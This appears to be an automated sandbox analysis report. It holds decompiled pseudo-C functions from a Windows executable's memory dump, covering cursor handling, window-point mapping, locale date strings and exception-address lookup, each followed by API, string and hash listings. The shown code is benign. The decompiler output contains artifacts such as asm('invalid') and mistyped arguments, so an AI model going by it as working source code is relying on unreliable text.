*((intOrPtr*)( *_t250 + 0x84)))) + 0xe8))( &_v113, _v12); 							OffsetRect( &_v113, _v64, _v60); 							if(E00403B24( *((intOrPtr*)( *_t250 + 0x84)), _t323) != 0) { 								_t238 = L00457F80(_v16, _t250, _t298, 0xffc7, _t309) + 5; 								_v113.left = _v113.left - _t238; 								_v113.right = _v113.right - _t238; 							} 							E0043A4AC( *((intOrPtr*)( *_t250 + 0x60)),  &_v140,  &_v48); 							_t218 =  *_t250; 							 *((intOrPtr*)(_t218 + 0x64)) = _v140; 							 *((intOrPtr*)(_t218 + 0x68)) = _v136; 							E0043A4AC( *((intOrPtr*)( *_t250 + 0x60)),  &_v140,  &(_v48.right)); 							_t222 =  *_t250; 							 *((intOrPtr*)(_t222 + 0x6c)) = _v140; 							 *((intOrPtr*)(_t222 + 0x70)) = _v136; 							E0043AB90( *((intOrPtr*)( *_t250 + 0x84)), _v52); 							_t115 =  *_t250 + 0x84; // 0xff7ce8c3 							 *((intOrPtr*)( *((intOrPtr*)( *_t115)) + 0xe4))(_v12); 							E0045539C(_v16); 							_t231 = _v24; 							if(_v24 <= 0) { 								E00457B58( *_t250, 1, _v20); 							} else { 								E00457B58( *_t250, 0, _t231); 							} 							L26: 							_pop(_t269); 							 *[fs:eax] = _t269; 							_push(E004583BE); 							E00404760( &_v148, 2); 							_t271 =  *0x44c7e8; // 0x44c7ec 							return E0040529C( &_v72, _t271); 						} 					} 				} 			}                        

                                                                            0x0045824a
                                                                            0x00000000
                                                                            0x00458250
                                                                            0x00458250
                                                                            0x00458254
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x0045825e
                                                                            0x00458277
                                                                            0x00458292
                                                                            0x004582a4
                                                                            0x004582bc
                                                                            0x004582c8
                                                                            0x004582cb
                                                                            0x004582ce
                                                                            0x004582ce
                                                                            0x004582df
                                                                            0x004582e4
                                                                            0x004582ec
                                                                            0x004582f5
                                                                            0x00458306
                                                                            0x0045830b
                                                                            0x00458313
                                                                            0x0045831c
                                                                            0x0045832a
                                                                            0x00458335
                                                                            0x00458343
                                                                            0x00458349
                                                                            0x0045834e
                                                                            0x00458353
                                                                            0x00458369
                                                                            0x00458355
                                                                            0x0045835b
                                                                            0x0045835b
                                                                            0x0045838b
                                                                            0x0045838d
                                                                            0x00458390
                                                                            0x00458393
                                                                            0x004583a3
                                                                            0x004583ab
                                                                            0x004583b6
                                                                            0x004583b6
                                                                            0x0045824a
                                                                            0x004580ba

                                                                            APIs
                                                                              • Part of subcall function 0044CBE4: GetActiveWindow.USER32 ref: 0044CBE7
                                                                              • Part of subcall function 0044CBE4: GetCurrentThreadId.KERNEL32 ref: 0044CBFC
                                                                              • Part of subcall function 0044CBE4: EnumThreadWindows.USER32(00000000,0044CBC4), ref: 0044CC02
                                                                              • Part of subcall function 00457DC8: GetCursor.USER32(?,?,?,?,?,?,?,?,?,?,?,004580D9,00000000,004583B7), ref: 00457DE3
                                                                              • Part of subcall function 00457DC8: GetIconInfo.USER32(00000000,?), ref: 00457DE9
                                                                            • ClientToScreen.USER32(?,?), ref: 00458161
                                                                            • OffsetRect.USER32(?,?,?), ref: 00458178
                                                                            • OffsetRect.USER32(?,?,?), ref: 004582A4
                                                                              • Part of subcall function 00457B58: SetTimer.USER32 ref: 00457B72
                                                                            Strings
                                                                            • 4jC , xrefs: 0045813E
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: OffsetRectThread$ActiveClientCurrentCursorEnumIconInfoScreenTimerWindowWindows
                                                                            • String ID: 4jC
                                                                            • API String ID: 2591747986-2900625241
                                                                            • Opcode ID: b8343d64523a10379c1ff20852f6b1ca7638a93d7df97c3be9be529c8dc35029
                                                                            • Instruction ID: 3c06f24524cbe1945d16a03846c9b40712580fa28ccc941ba7e8c22a91bf12dc
                                                                            • Opcode Fuzzy Hash: b8343d64523a10379c1ff20852f6b1ca7638a93d7df97c3be9be529c8dc35029
                                                                            • Instruction Fuzzy Hash: 27C1E435A00618CFCB10DFA9C494A9EB7F5BF49304F1081AAE905EB366DB34AD4ACF45
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 76%
                                                                                                                                  E0043B7E4(void* __eax, intOrPtr __ecx, intOrPtr __edx, signed char _a4) { 				intOrPtr _v8; 				signed char _v9; 				intOrPtr _v16; 				struct tagPOINT _v32; 				intOrPtr _v36; 				long _v40; 				char _v56; 				void* __edi; 				struct HWND__* _t57; 				void* _t63; 				signed char _t84; 				struct HWND__* _t108; 				void* _t110; 				intOrPtr _t134; 				intOrPtr _t137; 				void* _t141; 				struct HWND__* _t143; 				struct HWND__* _t147; 				void* _t152; 				void* _t154; 				intOrPtr _t155;  				_t152 = _t154; 				_t155 = _t154 + 0xffffffcc; 				_v8 = __ecx; 				_t137 = __edx; 				_t110 = __eax; 				if(__edx == 0 || __edx == 0xffffffff) { 					_t57 =  *(_t110 + 0x94); 					if(_t57 == 0 ||  *((char*)(_t57 + 0x1db)) == 0 ||  *((intOrPtr*)(_t57 + 0x1b0)) == 0) { 						E0041938C( *((intOrPtr*)(_t110 + 0x40)),  &_v40,  *((intOrPtr*)(_t110 + 0x44))); 						_v32.x = _v40; 						_v32.y = _v36; 						_t143 =  *(_t110 + 0x30); 						__eflags = _t143; 						if(_t143 != 0) { 							E0043A4AC(_t143,  &_v40,  &_v32); 							_v32.x = _v40; 							_v32.y = _v36; 						} 					} else { 						 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t57 + 0x1b0)))) + 0x14))(); 						MapWindowPoints(E004423F8( *(_t110 + 0x94)), 0,  &_v32, "true"); 					} 					_t63 = E0043A9A8(_t110); 					E004193DC(_v32.x, E0043A9BC(_t110), _v32.y,  &_v56, _t63); 					asm("movsd"); 					asm("movsd"); 					asm("movsd"); 					asm("movsd"); 					_v9 = E0043B9C4(_t110,  &_v32); 					goto L20; 				} else { 					E0043BCD0(__eax); 					__eflags =  *(_t110 + 0x94); 					if(__eflags == 0) { 						L12: 						_t84 = 1; 					} else { 						_t108 = E00403B24( *(_t110 + 0x94), __eflags); 						__eflags = _t108; 						if(_t108 != 0) { 							goto L12; 						} else { 							_t84 = 0; 						} 					} 					_v9 = _t84; 					__eflags = _v9; 					if(_v9 == 0) { 						L20: 						return _v9 & 0x000000ff; 					} 
else { 						_v16 = L00437D90(1, _t137); 						_push(_t152); 						_push(0x43b9b0); 						_push( *[fs:edx]); 						 *[fs:edx] = _t155; 						_t87 =  *(_t110 + 0x94); 						__eflags =  *(_t110 + 0x94); 						if( *(_t110 + 0x94) == 0) { 							_t147 = 0; 							__eflags = 0; 						} else { 							_t147 = E004423F8(_t87); 						} 						E0043A33C(_t110,  &_v32); 						__eflags = _t147; 						if(__eflags != 0) { 							MapWindowPoints(_t147, 0,  &_v32, "true"); 						} 						 *((intOrPtr*)(_v16 + 8)) = _t137; 						 *((char*)(_v16 + 0x5c)) = _a4 & 0x000000ff; 						 *((intOrPtr*)(_v16 + 0x60)) = _v8; 						asm("movsd"); 						asm("movsd"); 						asm("movsd"); 						asm("movsd"); 						_t141 = _t137; 						MapWindowPoints(0, E004423F8(_t141),  &_v32, 1); 						_push(_v32.y); 						E00403B24(_t141, __eflags); 						__eflags = 0; 						_pop(_t134); 						 *[fs:eax] = _t134; 						_push(0x43b9b7); 						return E00403928(_v16); 					} 				} 			}                        


                                                                            APIs
                                                                            • MapWindowPoints.USER32 ref: 0043B841
                                                                            • MapWindowPoints.USER32 ref: 0043B943
                                                                            • MapWindowPoints.USER32 ref: 0043B980
                                                                            Strings
                                                                            • QC , xrefs: 0043B8FC
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: PointsWindow
                                                                            • String ID: QC
                                                                            • API String ID: 4123100037-2823088291
                                                                            • Opcode ID: c87c83c8ec2422dba84d10b9213b873d1e9cb87eb2f57974cc0814849e7b209b
                                                                            • Instruction ID: 0050ec7504fc6389c387471725f03a9a37d0cdeba202718832385931f1dd160c
                                                                            • Opcode Fuzzy Hash: c87c83c8ec2422dba84d10b9213b873d1e9cb87eb2f57974cc0814849e7b209b
                                                                            • Instruction Fuzzy Hash: A5517071E002099BCB10DF69C881BEEB7F9EF49304F15506AEE14AB382C7789D05CBA5
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 79%
                                                                                                                                  E0040BC90(void* __eax, void* __ebx, signed int __edx, void* __edi, void* __esi, void* __eflags) { 				intOrPtr _v8; 				char _v12; 				void* _v16; 				char _v20; 				char _v24; 				intOrPtr _t50; 				intOrPtr _t52; 				intOrPtr _t54; 				intOrPtr _t56; 				intOrPtr _t80; 				void* _t81; 				intOrPtr _t82; 				intOrPtr _t88; 				intOrPtr _t96; 				intOrPtr _t115; 				signed int _t123; 				signed int _t125; 				void* _t127; 				intOrPtr _t130; 				void* _t131;  				_t131 = __eflags; 				_push(0); 				_push(0); 				_push(0); 				_push(0); 				_push(0); 				_t125 = __edx; 				_t127 = __eax; 				_push(_t130); 				_push(0x40be60); 				_push( *[fs:eax]); 				 *[fs:eax] = _t130; 				_t96 = 1; 				E0040473C(__edx); 				E0040B954(GetThreadLocale(), 0x40be78, 0x1009,  &_v12); 				if(E00408B44(0x40be78, 1, _t131) + 0xfffffffd - 3 < 0) { 					while(1) { 						__eflags = _t96 - E004049FC(_t127); 						if(__eflags > 0) { 							goto L29; 						} 						asm("bt [0x461808], eax"); 						if(__eflags >= 0) { 							_t50 = E00409184(_t127 + _t96 - 1, 2, 0x40be7c); 							__eflags = _t50; 							if(_t50 != 0) { 								_t52 = E00409184(_t127 + _t96 - 1, 4, 0x40be8c); 								__eflags = _t52; 								if(_t52 != 0) { 									_t54 = E00409184(_t127 + _t96 - 1, 2, 0x40bea4); 									__eflags = _t54; 									if(_t54 != 0) { 										_t56 = ( *(_t127 + _t96 - 1) & 0x000000ff) - 0x59; 										__eflags = _t56; 										if(_t56 == 0) { 											L25: 											E00404A08(_t125, 0x40bebc); 										} else { 											__eflags = _t56 != 0x20; 											if(_t56 != 0x20) { 												E00404924(); 												E00404A08(_t125, _v24); 											} else { 												goto L25; 											} 										} 									} else { 										E00404A08(_t125, 0x40beb0); 										_t96 = _t96 + 1; 									} 								} else { 									E00404A08(_t125, 0x40be9c); 									_t96 = 
_t96 + 3; 								} 							} else { 								E00404A08(_t125, 0x40be88); 								_t96 = _t96 + 1; 							} 							_t96 = _t96 + 1; 							__eflags = _t96; 						} else { 							_v8 = E0040CD80(_t127, _t96); 							E00404C60(_t127, _v8, _t96,  &_v20); 							E00404A08(_t125, _v20); 							_t96 = _t96 + _v8; 						} 					} 				} else { 					_t80 =  *0x4658cc; // 0x9 					_t81 = _t80 - 4; 					if(_t81 == 0 || _t81 + 0xfffffff3 - 2 < 0) { 						_t82 = 1; 					} else { 						_t82 = 0; 					} 					if(_t82 == 0) { 						E00404790(_t125, _t127); 					} else { 						while(_t96 <= E004049FC(_t127)) { 							_t88 = ( *(_t127 + _t96 - 1) & 0x000000ff) - 0x47; 							__eflags = _t88; 							if(_t88 != 0) { 								__eflags = _t88 != 0x20; 								if(_t88 != 0x20) { 									_t123 =  *(_t127 + _t96 - 1) & 0x000000ff; 									_push(ds); 									asm("invalid"); 									_t8 = _t125 + _t125 * 8 - 0xbaa7401; 									 *_t8 =  *((intOrPtr*)(_t125 + _t125 * 8 - 0xbaa7401)) + 0x40be78; 									__eflags =  *_t8; 									E00404A08(_t125, _t123); 								} 							} 							_t96 = _t96 + 1; 							__eflags = _t96; 						} 					} 				} 				L29: 				_pop(_t115); 				 *[fs:eax] = _t115; 				_push(0x40be67); 				return E00404760( &_v24, 4); 			}                        

                                                                            0x0040bd1e
                                                                            0x0040bd20
                                                                            0x0040bd20
                                                                            0x0040bd20
                                                                            0x0040bd29
                                                                            0x0040bd29
                                                                            0x0040bd15
                                                                            0x0040bd2e
                                                                            0x0040bd2e
                                                                            0x0040bd2e
                                                                            0x0040bd3a
                                                                            0x0040bd06
                                                                            0x0040be45
                                                                            0x0040be47
                                                                            0x0040be4a
                                                                            0x0040be4d
                                                                            0x0040be5f

                                                                            APIs
                                                                            • GetThreadLocale.KERNEL32(?,00000000,0040BE60,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 0040BCBF
                                                                              • Part of subcall function 0040B954: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0040B972
                                                                            Strings
                                                                            • eeee , xrefs: 0040BDCE
                                                                            • ggg , xrefs: 0040BDA5
                                                                            • yyyy , xrefs: 0040BDB5
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: Locale$InfoThread
                                                                            • String ID: eeee$ggg$yyyy
                                                                            • API String ID: 4232894706-1253427255
                                                                            • Opcode ID: 22af1f82e12c2a638afe9ae91d7be04f620c0193c2544057d1f3039dc33699de
                                                                            • Instruction ID: e06779fda62c0aa1c2fe6e63d9f97ef423efd52b2f0bde73b2610bed017219b3
                                                                            • Opcode Fuzzy Hash: 22af1f82e12c2a638afe9ae91d7be04f620c0193c2544057d1f3039dc33699de
                                                                            • Instruction Fuzzy Hash: 0341D2B03041454BC711AA7AC8866BFF2E6DF95304B64443BAA51B73C6DB3CAD0296ED
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 83%
E004389EC(intOrPtr __eax, intOrPtr __ecx, void* __edx, void* __fp0) {
    intOrPtr _v8;
    intOrPtr _v12;
    struct tagPOINT _v20;
    intOrPtr _v24;
    char _v28;
    char _v36;
    void* __edi;
    void* __ebp;
    intOrPtr _t54;
    intOrPtr _t60;
    intOrPtr _t65;
    intOrPtr _t71;
    intOrPtr _t74;
    void* _t88;
    intOrPtr _t105;
    intOrPtr _t115;
    intOrPtr _t116;
    intOrPtr _t120;
    intOrPtr _t123;
    intOrPtr _t124;
    intOrPtr _t129;
    void* _t133;
    intOrPtr _t134;
    void* _t137;

    _t137 = __fp0;
    _v8 = __ecx;
    _t88 = __edx;
    _t124 = __eax;
    *0x466510 = __eax;
    _push(_t133);
    _push(0x438b91);
    _push( *[fs:edx]);
    *[fs:edx] = _t134;
    _v12 = 0;
    *0x466518 = 0;
    _t135 = *((char*)(__eax + 0x8f));
    if( *((char*)(__eax + 0x8f)) != 0) {
        E00403B24(__eax, __eflags);
        __eflags = *0x466510;
        if( *0x466510 != 0) {
            __eflags = _v12;
            if(_v12 == 0) {
                _v12 = L00437D90(1, _t124);
                *0x466518 = 1;
            }
            _t128 = *((intOrPtr*)(_v12 + 0x40));
            _t105 = *0x4369e8; // 0x436a34
            _t54 = E00403AB4( *((intOrPtr*)(_v12 + 0x40)), _t105);
            __eflags = _t54;
            if(_t54 == 0) {
                _t129 = *((intOrPtr*)(_v12 + 0x40));
                __eflags = *((intOrPtr*)(_t129 + 0x30));
                if( *((intOrPtr*)(_t129 + 0x30)) != 0) {
                    L14:
                    __eflags = 0;
                    E0041938C(0, &_v36, 0);
                    E0043A4AC(_t129, &_v28, &_v36);
                    _t60 = _v12;
                    *((intOrPtr*)(_t60 + 0x4c)) = _v28;
                    *((intOrPtr*)(_t60 + 0x50)) = _v24;
                    L15:
                    __eflags = *(_v12 + 0x4c) + *((intOrPtr*)( *((intOrPtr*)(_v12 + 0x40)) + 0x48));
                    E0041938C( *(_v12 + 0x4c) + *((intOrPtr*)( *((intOrPtr*)(_v12 + 0x40)) + 0x48)), &_v28, *((intOrPtr*)(_v12 + 0x50)) + *((intOrPtr*)( *((intOrPtr*)(_v12 + 0x40)) + 0x4c)));
                    _t65 = _v12;
                    *((intOrPtr*)(_t65 + 0x54)) = _v28;
                    *((intOrPtr*)(_t65 + 0x58)) = _v24;
                    goto L16;
                }
                _t116 = *0x4369e8; // 0x436a34
                _t71 = E00403AB4(_t129, _t116);
                __eflags = _t71;
                if(_t71 != 0) {
                    goto L14;
                }
                GetCursorPos( &_v20);
                _t74 = _v12;
                *(_t74 + 0x4c) = _v20.x;
                *((intOrPtr*)(_t74 + 0x50)) = _v20.y;
                goto L15;
            } else {
                GetWindowRect(E004423F8(_t128), _v12 + 0x4c);
                L16:
                asm("movsd");
                asm("movsd");
                asm("movsd");
                asm("movsd");
                L17:
                E0043887C(_v12, _v8, _t88, _t133, _t137);
                _pop(_t115);
                *[fs:eax] = _t115;
                return 0;
            }
        }
        _pop(_t120);
        *[fs:eax] = _t120;
        return 0;
    }
    E00403B24(__eax, _t135);
    if( *0x466510 != 0) {
        __eflags = _v12;
        if(_v12 == 0) {
            _v12 = E00437C80(_t124, 1);
            *0x466518 = 1;
        }
        goto L17;
    }
    _pop(_t123);
    *[fs:eax] = _t123;
    return 0;
}


                                                                            Strings
                                                                            • 4jC , xrefs: 00438ABA, 00438AF0
                                                                            • XQC , xrefs: 00438A57
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 4jC$XQC
                                                                            • API String ID: 0-1995860932
                                                                            • Opcode ID: 40d017accbd6cdc67a0eb8db3641b7ff0a2e78bce7532e2636fa8d279195c8d0
                                                                            • Instruction ID: 261b67947a93c7365b213fc49c75792a3b9849106cec410a1886ea52049641a3
                                                                            • Opcode Fuzzy Hash: 40d017accbd6cdc67a0eb8db3641b7ff0a2e78bce7532e2636fa8d279195c8d0
                                                                            • Instruction Fuzzy Hash: E4518F70A047099FCB00DF59D841A9EFBB5FF88318F2190AAF800A7351D779A985CB89
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 85%
E0043887C(intOrPtr* __eax, intOrPtr __ecx, intOrPtr __edx, void* __ebp, long long __fp0) {
    intOrPtr _v16;
    intOrPtr _t24;
    intOrPtr _t26;
    intOrPtr _t28;
    intOrPtr* _t32;
    intOrPtr _t35;
    intOrPtr _t37;
    struct HWND__* _t38;
    intOrPtr _t39;
    intOrPtr* _t41;
    intOrPtr _t45;
    intOrPtr _t49;
    intOrPtr* _t53;
    long _t58;
    intOrPtr _t59;
    intOrPtr _t60;
    intOrPtr* _t65;
    intOrPtr _t66;
    intOrPtr _t70;
    intOrPtr* _t77;
    void* _t79;
    intOrPtr* _t80;
    long long _t87;

    _t87 = __fp0;
    _t80 = _t79 + 0xfffffff8;
    _t70 = __ecx;
    _t45 = __edx;
    _t77 = __eax;
    *0x466514 = __eax;
    _t24 = *0x466514; // 0x0
    *((intOrPtr*)(_t24 + 8)) = 0;
    GetCursorPos(0x466520);
    _t26 = *0x466514; // 0x0
    _t58 = 0x466520->x; // 0x0
    *(_t26 + 0x10) = _t58;
    _t59 = *0x466524; // 0x0
    *((intOrPtr*)(_t26 + 0x14)) = _t59;
    *0x466528 = GetCursor();
    _t28 = *0x466514; // 0x0
    *0x46651c = E00437A5C(_t28);
    *0x46652c = _t70;
    _t60 = *0x43519c; // 0x4351e8
    if(E00403AB4(_t77, _t60) == 0) {
        __eflags = _t45;
        if(__eflags == 0) {
            *0x466530 = 0;
        } else {
            *0x466530 = 1;
        }
    } else {
        _t65 = _t77;
        _t4 = _t65 + 0x4c; // 0x4c
        _t41 = _t4;
        _t49 = *_t41;
        if( *((intOrPtr*)(_t41 + 8)) - _t49 <= 0) {
            __eflags = 0;
            *((intOrPtr*)(_t65 + 0x28)) = 0;
            *((intOrPtr*)(_t65 + 0x2c)) = 0;
        } else {
            *_t80 = *((intOrPtr*)(_t65 + 0x10)) - _t49;
            asm("fild dword [esp]");
            _v16 = *((intOrPtr*)(_t41 + 8)) - *_t41;
            asm("fild dword [esp+0x4]");
            asm("fdivp st1, st0");
            *((long long*)(_t65 + 0x28)) = __fp0;
            asm("wait");
        }
        _t66 = *((intOrPtr*)(_t41 + 4));
        if( *((intOrPtr*)(_t41 + 0xc)) - _t66 <= 0) {
            __eflags = 0;
            *((intOrPtr*)(_t77 + 0x30)) = 0;
            *((intOrPtr*)(_t77 + 0x34)) = 0;
        } else {
            _t53 = _t77;
            *_t80 = *((intOrPtr*)(_t53 + 0x14)) - _t66;
            asm("fild dword [esp]");
            _v16 = *((intOrPtr*)(_t41 + 0xc)) - *((intOrPtr*)(_t41 + 4));
            asm("fild dword [esp+0x4]");
            asm("fdivp st1, st0");
            *((long long*)(_t53 + 0x30)) = _t87;
            asm("wait");
        }
        if(_t45 == 0) {
            *0x466530 = 0;
        } else {
            *0x466530 = 2;
            *((intOrPtr*)( *_t77 + 0x30))();
        }
    }
    _t32 = *0x466514; // 0x0
    *0x466534 = *((intOrPtr*)( *_t32 + 8))();
    _t85 = *0x466534;
    if( *0x466534 != 0) {
        _t37 = *0x466524; // 0x0
        _t38 = GetDesktopWindow();
        _t39 = *0x466534; // 0x0
        L00443F74(_t39, _t38, _t85, _t37);
    }
    _t35 = E004038F8(1);
    *0x46653c = _t35;
    if( *0x466530 != 0) {
        _t35 = E00438594(0x466520, 1);
    }
    return _t35;
}


                                                                            APIs
                                                                            • GetCursorPos.USER32(00466520), ref: 0043889D
                                                                            • GetCursor.USER32(00466520), ref: 004388B9
                                                                              • Part of subcall function 00437A5C: SetCapture.USER32(00000000,?,004388CD,00466520), ref: 00437A6B
                                                                            • GetDesktopWindow.USER32 ref: 004389AB
                                                                            Strings
                                                                            • QC , xrefs: 004388DA
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: Cursor$CaptureDesktopWindow
                                                                            • String ID: QC
                                                                            • API String ID: 669539147-2823088291
                                                                            • Opcode ID: 200d8bcdea4dcfc9e7a4f1829237d1693a01099067dc619cf08afe8f43068f09
                                                                            • Instruction ID: ec58099d30e1c5017fec0aa898c8ab184d5e574ebc14b3c512b5b419d34dbb6a
                                                                            • Opcode Fuzzy Hash: 200d8bcdea4dcfc9e7a4f1829237d1693a01099067dc619cf08afe8f43068f09
                                                                            • Instruction Fuzzy Hash: 74415EB16052009FC304DF2DF985625BBE1BF88304B16956EE48A9B369EB75D841CF8A
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 86%
E0040C574(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr _a4) {
    char _v8;
    struct _MEMORY_BASIC_INFORMATION _v36;
    char _v297;
    char _v304;
    intOrPtr _v308;
    char _v312;
    char _v316;
    char _v320;
    intOrPtr _v324;
    char _v328;
    void* _v332;
    char _v336;
    char _v340;
    char _v344;
    char _v348;
    intOrPtr _v352;
    char _v356;
    char _v360;
    char _v364;
    void* _v368;
    char _v372;
    intOrPtr _t52;
    intOrPtr _t60;
    intOrPtr _t82;
    intOrPtr _t86;
    intOrPtr _t89;
    intOrPtr _t101;
    void* _t108;
    intOrPtr _t110;
    void* _t113;

    _t108 = __edi;
    _v372 = 0;
    _v336 = 0;
    _v344 = 0;
    _v340 = 0;
    _v8 = 0;
    _push(_t113);
    _push(0x40c72f);
    _push( *[fs:eax]);
    *[fs:eax] = _t113 + 0xfffffe90;
    _t89 = *((intOrPtr*)(_a4 - 4));
    if( *((intOrPtr*)(_t89 + 0x14)) != 0) {
        _t52 = *0x462dac; // 0x407654
        E00406740(_t52, &_v8);
    } else {
        _t86 = *0x462f40; // 0x40764c
        E00406740(_t86, &_v8);
    }
    _t110 = *((intOrPtr*)(_t89 + 0x18));
    VirtualQuery( *(_t89 + 0xc), &_v36, 0x1c);
    if(_v36.State != 0x1000 || GetModuleFileNameA(_v36.AllocationBase, &_v297, 0x105) == 0) {
        _v368 = *(_t89 + 0xc);
        _v364 = 5;
        _v360 = _v8;
        _v356 = 0xb;
        _v352 = _t110;
        _v348 = 5;
        _t60 = *0x462db8; // 0x4075fc
        E00406740(_t60, &_v372);
        E0040C158(_t89, _v372, 1, _t108, _t110, "true", &_v368);
    } else {
        _v332 = *(_t89 + 0xc);
        _v328 = 5;
        E004049AC( &_v340, 0x105, &_v297);
        E00408F20(_v340, &_v336);
        _v324 = _v336;
        _v320 = 0xb;
        _v316 = _v8;
        _v312 = 0xb;
        _v308 = _t110;
        _v304 = 5;
        _t82 = *0x462e34; // 0x407714
        E00406740(_t82, &_v344);
        E0040C158(_t89, _v344, 1, _t108, _t110, 3, &_v332);
    }
    _pop(_t101);
    *[fs:eax] = _t101;
    _push(E0040C736);
    E0040473C( &_v372);
    E00404760( &_v344, 3);
    return E0040473C( &_v8);
}


                                                                            APIs
                                                                            • VirtualQuery.KERNEL32(?,?,0000001C,00000000,0040C72F), ref: 0040C5DF
                                                                            • GetModuleFileNameA.KERNEL32(?,?,00000105,?,?,0000001C,00000000,0040C72F), ref: 0040C601
                                                                              • Part of subcall function 00406740: LoadStringA.USER32 ref: 00406772
                                                                            Strings
                                                                            • Tv@ , xrefs: 0040C5C8
                                                                            • Lv@ , xrefs: 0040C5B9
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: FileLoadModuleNameQueryStringVirtual
                                                                            • String ID: Lv@$Tv@
                                                                            • API String ID: 902310565-3490928387
                                                                            • Opcode ID: 24279c15491266c301eb2aa81648ac00ce9ad9d101245f32d7359d387ba785dc
                                                                            • Instruction ID: c01818685c40b8fea18ad10fd3e77254e6e7d063cfafddee118467fe47f8fec1
                                                                            • Opcode Fuzzy Hash: 24279c15491266c301eb2aa81648ac00ce9ad9d101245f32d7359d387ba785dc
                                                                            • Instruction Fuzzy Hash: 30413670900668DFDB61DF64CC84BDAB7F5AB49304F4040EAE508AB391D7B8AE84CF95
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 65%
E0040BA08(void* __ebx, void* __edi, void* __esi) {
    int _v8;
    signed int _v12;
    char _v16;
    char _v20;
    char _v24;
    char _v28;
    void* _t53;
    void* _t54;
    intOrPtr _t80;
    void* _t83;
    void* _t84;
    void* _t86;
    void* _t87;
    intOrPtr _t90;

    _t89 = _t90;
    _push(0);
    _push(0);
    _push(0);
    _push(0);
    _push(0);
    _push(0);
    _push(_t90);
    _push(0x40bb1b);
    _push( *[fs:eax]);
    *[fs:eax] = _t90;
    _v8 = GetThreadLocale();
    _t53 = 1;
    _t86 = 0x465830;
    _t83 = 0x465860;
    do {
        _t3 = _t53 + 0x44; // 0x45
        E0040B9CC(_t3 - 1, _t53 - 1, &_v16, 0xb, _t89);
        E00404790(_t86, _v16);
        _t6 = _t53 + 0x38; // 0x39
        E0040B9CC(_t6 - 1, _t53 - 1, &_v20, 0xb, _t89);
        E00404790(_t83, _v20);
        _t53 = _t53 + 1;
        _t83 = _t83 + 4;
        _t86 = _t86 + 4;
    } while (_t53 != 0xd);
    _t54 = 1;
    _t87 = 0x465890;
    _t84 = 0x4658ac;
    do {
        _t8 = _t54 + 5; // 0x6
        asm("cdq");
        _v12 = _t8 % 7;
        E0040B9CC(_v12 + 0x31, _t54 - 1, &_v24, 6, _t89);
        E00404790(_t87, _v24);
        E0040B9CC(_v12 + 0x2a, _t54 - 1, &_v28, 6, _t89);
        E00404790(_t84, _v28);
        _t54 = _t54 + 1;
        _t84 = _t84 + 4;
        _t87 = _t87 + 4;
    } while (_t54 != 8);
    _pop(_t80);
    *[fs:eax] = _t80;
    _push(E0040BB22);
